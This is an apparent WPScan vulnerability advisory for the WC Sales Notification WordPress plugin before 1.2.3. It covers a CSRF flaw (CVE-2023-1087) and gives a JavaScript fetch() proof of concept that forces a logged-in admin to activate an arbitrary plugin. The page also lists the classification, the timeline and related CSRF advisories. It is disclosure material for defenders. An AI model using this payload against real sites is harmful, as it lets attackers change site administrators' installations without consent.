WordPress Plugin Vulnerabilities

WC Sales Notification < 1.2.3 - Arbitrary Plugin Activation via CSRF

Description

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

Proof of Concept

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wcsalesnotification_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Plugin icon
wc-sales-notification
Fixed in 1.2.3

References

CVE
CVE-2023-1087

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
356c89a1-81b6-4600-9291-1a74788af7f9

Timeline

Publicly Published
2023-02-28 (about 1 years ago)
Added
2023-02-28 (about 1 years ago)
Last Updated
2023-02-28 (about 1 years ago)

Other

Published
Title
Published
2022-10-30
Title
Appointment Hour Booking < 1.3.72 - Feedback Submission via CSRF
Published
2021-09-11
Title
WP Statistics < 13.1.2 - Arbitrary Plugin Activation/Deactivation via CSRF
Published
2024-04-10
Title
Dashboard To-Do List < 1.3.2 - Cross-Site Request Forgery via ardtdw_widgetupdate()
Published
2023-09-25
Title
BEAR for WordPress < 1.1.4 - Arbitrary Settings Update via CSRF
Published
2024-05-09
Title
Church Admin < 4.2.0 - Cross-Site Request Forgery